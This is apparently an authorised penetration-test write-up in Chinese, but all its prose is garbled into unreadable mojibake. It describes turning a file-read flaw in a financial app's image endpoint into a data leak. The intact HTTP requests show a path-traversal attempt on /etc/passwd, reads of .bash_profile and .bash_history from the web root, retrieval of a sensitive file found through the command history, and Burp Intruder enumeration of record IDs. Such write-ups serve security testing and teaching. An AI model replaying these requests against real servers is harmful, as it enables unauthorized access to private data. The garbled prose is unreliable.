ÔÚÊÚȨ²âÊÔij½ðÈÚÀàAPPʱ£¬£¬£¬£¬£¬£¬£¬£¬·¢Ã÷Ò»¸ö¼¦ÀßµÍΣÎļþ¶ÁÈ¡Îó²î£¬£¬£¬£¬£¬£¬£¬£¬ÊµÑ齫ÆäÉý¼¶Îª¸ßΣ¡£¡£¡£¡£¡£¡£
PS£º±¾ÎĽöÓÃÓÚÊÖÒÕÌÖÂÛÓëÆÊÎö£¬£¬£¬£¬£¬£¬£¬£¬ÑϽûÓÃÓÚÈκβ»·¨ÓÃ;£¬£¬£¬£¬£¬£¬£¬£¬Î¥ÕßЧ¹û×Ô×𡣡£¡£¡£¡£¡£
0x00 ÆðԴ̽²â
·¢Ã÷Ê״η¿ªAPPʱ£¬£¬£¬£¬£¬£¬£¬£¬»áÏò·þÎñÆ÷¶ÁÈ¡Îļþ¼ÓÔØ²¢Õ¹Ê¾Í¼Æ¬¡£¡£¡£¡£¡£¡£
²âÊÔʱһ¶¨Òª×Ðϸ£¬£¬£¬£¬£¬£¬£¬£¬±ÊÕß·¢Ã÷Ö»ÓÐÊ״η¿ªAPPʱ£¬£¬£¬£¬£¬£¬£¬£¬²Å»á¼ÓÔØÍ¼Æ¬£¬£¬£¬£¬£¬£¬£¬£¬ºóÃæÔÙ·¿ªÓ¦¸ÃÊÇ×ÊÔ´Òѱ»¼Í¼£¬£¬£¬£¬£¬£¬£¬£¬¾Í²»»áÏò·þÎñÆ÷ÔٴξÙÐÐÇëÇóÁË¡£¡£¡£¡£¡£¡£

´Ë¼ÓÔØÕ¹Ê¾Í¼Æ¬µÄGETÇëÇóÊý¾Ý°üÈçÏ£º

GET /ixxx/LgonImage.do?XxxxxImageDir=/XXXXX/Pictures&SaveXxxxxImageName=this_is_image.jpg HTTP/1.1
Host: xxxxx.com
Connection: close
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,en-US;q=0.8
Äõ½Õâ¸öÊý¾Ý°üµÄµÚÒ»·´Ó¦£¬£¬£¬£¬£¬£¬£¬£¬ÒÔÍùµÄÉøÍ¸²âÊÔÂÄÀú¸æËßÎÒ£¬£¬£¬£¬£¬£¬£¬£¬´ÓÕâ¸öµØ·½»òÐí·»á±£´æÎļþ¶ÁÈ¡Îó²î¡£¡£¡£¡£¡£¡£
ÆÊÎö²¢ÍƲ⹦ЧµãURIµÄÿ¸ö²ÎÊýµÄ¹¦Ð§¡£¡£¡£¡£¡£¡£
LogonImageDir=/XXXXX/Pictures - ͼƬËùÔÚµÄĿ¼
SaveXxxxxImageName=this_is_image.jpg - Ŀ¼ÏµÄͼƬÃû
0x01 Îó²î²âÊÔ
¼ÈÈ»ÒѾÆðԴ̽²âµ½ÁË¿ÉÄܱ£´æÎó²îµÄΣº¦µã£¬£¬£¬£¬£¬£¬£¬£¬²¢ÇÒÎļþ¶ÁÈ¡¹¦Ð§µÄ²ÎÊýÒѾ¸ãÇåÎú£¬£¬£¬£¬£¬£¬£¬£¬ÏÂÒ»²½¾ÍÕö¿ª¶ÁÈ¡²âÊÔ¡£¡£¡£¡£¡£¡£
Ê×ÏȲâÊÔ£¬£¬£¬£¬£¬£¬£¬£¬ÊÇ·ñ¿ÉÒÔ¾ÙÐÐĿ¼Áгö£¬£¬£¬£¬£¬£¬£¬£¬Ö±½Ó½«SaveXxxxxImageName²ÎÊýÖÿգ¬£¬£¬£¬£¬£¬£¬£¬¿´¿´ÊÇ·ñ¿ÉÒÔ¶ÁÈ¡/XXXXX/PicturesĿ¼ÏµÄÄÚÈÝ£º
GET /ixxx/LogonImage.do?XxxxxImageDir=/XXXXX/Pictures&SaveXxxxxImageName= HTTP/1.1
Host: xxxxx.com
Connection: close
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,en-US;q=0.8
·µ»ØÎª¡°¿Õ¡±£¬£¬£¬£¬£¬£¬£¬£¬Ê§°Ü£¬£¬£¬£¬£¬£¬£¬£¬ËµÃ÷³ÌÐò¹¦Ð§µã²»±£´æÁгöĿ¼Îó²î£º

²âÊÔÊÇ·ñ¿ÉÒÔÌø³öĿ¼£¬£¬£¬£¬£¬£¬£¬£¬Ñ¡ÓÃPayloadÈçÏ£º
GET /ixxx/LogonImage.do?XxxxxImageDir=/XXXXX/Pictures/../../../../../../etc/&SaveXxxxxImageName=passwd HTTP/1.1
Host: xxxxx.com
Connection: close
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,en-US;q=0.8
·µ»ØÄ³ºã·À»ðǽ×èµ²½çÃæ£¬£¬£¬£¬£¬£¬£¬£¬Ê§°Ü£º


½ÓÏÂÀ´½øÒ»²½²âÊÔ£¬£¬£¬£¬£¬£¬£¬£¬ÊÇ/etc/passwd´¥·¢µÄWAF£¬£¬£¬£¬£¬£¬£¬£¬ÕÕ¾É/../´¥·¢µÄWAF¡£¡£¡£¡£¡£¡£
²âÊÔÖ»¾ÙÐÐÒ»²ãÄ¿Â¼Ìø³ö£¬£¬£¬£¬£¬£¬£¬£¬²¢ÇÒɾ³ý/etc/passwdÒªº¦×Ö£º
GET /ixxx/LogonImage.do?XxxxxImageDir=/XXXXX/Pictures/../&SaveXxxxxImageName= HTTP/1.1
Host: xxxxx.com
Connection: close
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,en-US;q=0.8
ßí...¿´À´/../µÄÌØÊâ×Ö·û¾ÍÒѾ´¥·¢ÁËWAF£º

Ö®ºóÏ뵽ʵÑé¶ÔÊý¾Ý°ü¾ÙÐÐPOSTÀàÐÍת»»£¬£¬£¬£¬£¬£¬£¬£¬Ê¹ÓÃPOST´«²ÎµÄһЩ·½·¨¾ÙÐÐWAFµÄ²âÊÔ£¬£¬£¬£¬£¬£¬£¬£¬È磺
URL±àÂë
·Ö¿é´«Êä
ÔàÊý¾ÝÌî³ä
°üÌåת»»
»ûÐÎÊý¾Ý°ü
......
¿ÉÊÇÎÞÄΣ¬£¬£¬£¬£¬£¬£¬£¬POSTÇëÇóÖ±½ÓÎÞ·¨´«²Î£¬£¬£¬£¬£¬£¬£¬£¬³ÌÐòÏÞÖÆÁËGETÇëÇóÎüÊÕ²ÎÊý¡£¡£¡£¡£¡£¡£
£¨²»¹ý£¬£¬£¬£¬£¬£¬£¬£¬ØÊºó²âÊÔÆäËûPOST´«²ÎµÄ¹¦Ð§Ê±£¬£¬£¬£¬£¬£¬£¬£¬·¢Ã÷ÒÔ±ÊÕßÏÖÓеÄWAFÈÆ¹ýÂÄÀú˼Ð÷£¬£¬£¬£¬£¬£¬£¬£¬»ù´¡ÎÞ·¨¶ÔijºãµÄWAF¾ÙÐÐÈÆ¹ý.....£©
0x02 Îó²îÈ·ÈÏ
×ܽáÒÔÉ϶ԴËÎļþ¶ÁÈ¡Îó²îÍøÂçµ½µÄÐÅÏ¢£º
Ŀ¼ÎÞ·¨¿çÔ½£¬£¬£¬£¬£¬£¬£¬£¬²¢ÇÒÎļþ¶ÁÈ¡µÄ·¾¶ÔÚÄ¿½ñ¸ùĿ¼£»£»£»£»£»£»£»
ÌØÊâ×Ö·û´®£¬£¬£¬£¬£¬£¬£¬£¬Òѱ»WAFÍêÉÆ·À»¤×¡£¡£¡£¡£¡£¡£»£»£»£»£»£»£»
ÎÞ·¨»ñȡĿ¼ÏµÄÎļþÃû¡¢ÎÞ·¨Ô¤ÖªÊÇ·ñ¿ÉÒÔ¶ÁÈ¡ÆäËûºó׺Îļþ¡£¡£¡£¡£¡£¡£
²âÊÔµ½ÕâÀïͻȻÁé¹âÒ»ÉÁ£¬£¬£¬£¬£¬£¬£¬£¬Ïëµ½ÁË¡°.bash_history¡±£¬£¬£¬£¬£¬£¬£¬£¬ÈôÊÇÍøÕ¾¸ùĿ¼±£´æ´ËÎļþ£¬£¬£¬£¬£¬£¬£¬£¬²¢ÇÒ¿ÉÒÔ¶ÁÈ¡£¬£¬£¬£¬£¬£¬£¬£¬ÉÏÃæµÄÒÉÎʾͿÉÒÔÖ±½Ó½â¾öÌ©°ëÁË£¬£¬£¬£¬£¬£¬£¬£¬ÏÈÀ´ÏàʶһÏÂÕâЩÎļþ×÷Óãº
.bash_profile£º´ËÎļþΪϵͳµÄÿ¸öÓû§ÉèÖÃÇéÐÎÐÅÏ¢£¬£¬£¬£¬£¬£¬£¬£¬µ±Óû§µÚÒ»´ÎµÇ¼ʱ£¬£¬£¬£¬£¬£¬£¬£¬¸ÃÎļþ±»Ö´ÐС£¡£¡£¡£¡£¡£
.bash_history£º¸ÃÎļþÉúÑÄÁËÄ¿½ñÓû§ÊäÈë¹ýµÄÀúÊ·ÏÂÁ£»£»£»£»£»£»
.bash_logout£º¸ÃÎļþµÄÓÃ;ÊÇÓû§×¢ÏúʱִÐеÄÏÂÁ£¬£¬£¬£¬£¬£¬£¬Ä¬ÒÔΪ¿Õ£»£»£»£»£»£»£»
.bashrc£º´ËÎļþΪÿһ¸öÔËÐÐbash shellµÄÓû§Ö´ÐдËÎļþ¡£¡£¡£¡£¡£¡£µ±bash shell±»·¿ªÊ±£¬£¬£¬£¬£¬£¬£¬£¬¸ÃÎļþ±»¶ÁÈ¡¡£¡£¡£¡£¡£¡£
ÓÚÊÇÖ±½Ó¶ÔÍøÕ¾¸ùĿ¼¾ÙÐÐ.bash_profileµÄä²â£º
GET /ixxx/LogonImage.do?XxxxxImageDir=/&SaveXxxxxImageName=.bash_profile HTTP/1.1
Host: xxxxx.com
Connection: close
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,en-US;q=0.8
´Ëpayload¼È×èÖ¹ÁËÌø³öĿ¼£¬£¬£¬£¬£¬£¬£¬£¬ÓֱܿªÁËWAFÑÏ´òµÄÌØÊâ×Ö·û£¬£¬£¬£¬£¬£¬£¬£¬¿ÉÊÇΨһÒÅ©µÄ.bashÎļþ±»ÎÒÃÇʹÓõ½ÁË¡£¡£¡£¡£¡£¡£

¼¤¶¯µÄÐIJü¶¶µÄÊÖ£¬£¬£¬£¬£¬£¬£¬£¬¿´À´Ä¿½ñÍøÕ¾¸ùĿ¼ȷʵÊÇ´ËÓû§µÄĿ¼£¬£¬£¬£¬£¬£¬£¬£¬²¢ÇÒÓû§Ôڴ˸ùĿ¼ÏÂÖ´ÐйýÏÂÁ
½ÓÏÂÀ´ÊµÑé½øÒ»²½À©´óΣº¦¡£¡£¡£¡£¡£¡£
0x03 Σº¦Éý¼¶
²»ÇåÎúÄ¿½ñĿ¼½á¹¹£¬£¬£¬£¬£¬£¬£¬£¬¾Í´ú±í×ÅÎÞ·¨¶¨Ïò¶ÁÈ¡Îļþ£¬£¬£¬£¬£¬£¬£¬£¬¿ÉÊÇÉÐÓÐÒ»¸ö.bash_historyÎÒÃÇûÓÐʹÓõ½£¬£¬£¬£¬£¬£¬£¬£¬¿´¿´ÊÇ·ñ¿ÉÒÔÔÚÆäÖлñÈ¡µ½¸üÖ÷ÒªµÄÐÅÏ¢¡£¡£¡£¡£¡£¡£
¶ÁÈ¡¸ùĿ¼ÏµÄ.bash_history£º
GET /ixxx/LogonImage.do?XxxxxImageDir=/&SaveXxxxxImageName=.bash_history HTTP/1.1
Host: xxxxx.com
Connection: close
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,en-US;q=0.8
ÐÅÏ¢Á¿ËäÈ»ÉÙ£¬£¬£¬£¬£¬£¬£¬£¬¿ÉÊÇÒѾÓÐÁËеÄÏ£Íû£º

ÓÉÀúÊ·ÏÂÁîµÃÖª£¬£¬£¬£¬£¬£¬£¬£¬¹ÜÀíÔ±cd½øÈëÁËÁ½²ãĿ¼£º/Nxxxx/xxFile/
²¢ÇÒÉó²éÁËxx_20201022_51xxx.txtÎļþ¡£¡£¡£¡£¡£¡£
Ö±½Ó½á¹¹¶ÁÈ¡´ËÎļþ£¡
GET /ixxx/LogonImage.do?XxxxxImageDir=/Nxxxx/xxFile&SaveXxxxxImageName=xx_20201022_51xxx.txt HTTP/1.1
Host: xxxxx.com
Connection: close
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,en-US;q=0.8
ÀֳɶÁÈ¡µ½ÁËÃô¸ÐµÄÊý¾ÝÐÅÏ¢£º

²¢ÇÒÎļþµÄIDֵΪʱ¼ä´Á+ID˳Ðò±àºÅ×é³É£¬£¬£¬£¬£¬£¬£¬£¬¿ÉÇáËɱéÀú³öËùÓеÄÐÅÏ¢¡£¡£¡£¡£¡£¡£
Burpsuite IntruderÄ£¿£¿£¿£¿£¿£¿£¿£¿é²âÊÔ£º

ʵÑé±éÀú10¸öIDÖµÀֳɡ£¡£¡£¡£¡£¡£
0x04 »ØÊ××ܽá
±£´æµÄÄÑÌ⣺Ŀ¼ÎÞ·¨¿çÔ½¡¢WAF¶¢·À¡¢ÎÞ·¨Ô¤ÖªÄ¿Â¼Îļþ½á¹¹¡£¡£¡£¡£¡£¡£
ÔÚ´ËÇéÐÎÏ£¬£¬£¬£¬£¬£¬£¬£¬Ê¹ÓÃLinuxÎļþÏµÍ³ÌØÕ÷£¬£¬£¬£¬£¬£¬£¬£¬ÈÔÈ»¿ÉÒÔ½«µÍΣÎó²îÌáÉýÖÁ¸ßΣ¡£¡£¡£¡£¡£¡£
²¢ÇÒΣº¦µÄÆ·¼¶Æéá«ÊÇÎÞ·¨Ô¤¹ÀµÄ£¬£¬£¬£¬£¬£¬£¬£¬ÕâÈ¡¾öÓÚ.bash_history»á¸øÎÒÃÇй¶¼¸¶àÐÅÏ¢£¬£¬£¬£¬£¬£¬£¬£¬ÒÔÊÇÎļþ¶ÁÈ¡Îó²î±£´æÊ±¼äÔ½¾Ã£¬£¬£¬£¬£¬£¬£¬£¬¼Í¼µÄ¹¤¾ßÔ½¶à£¬£¬£¬£¬£¬£¬£¬£¬Î£º¦Ô½´ó£¡
- Òªº¦´Ê±êÇ©£º
- ÍøÂçÇå¾² Îļþ¶ÁÈ¡Îó²î,

¾©¹«Íø°²±¸ 11010802026257ºÅ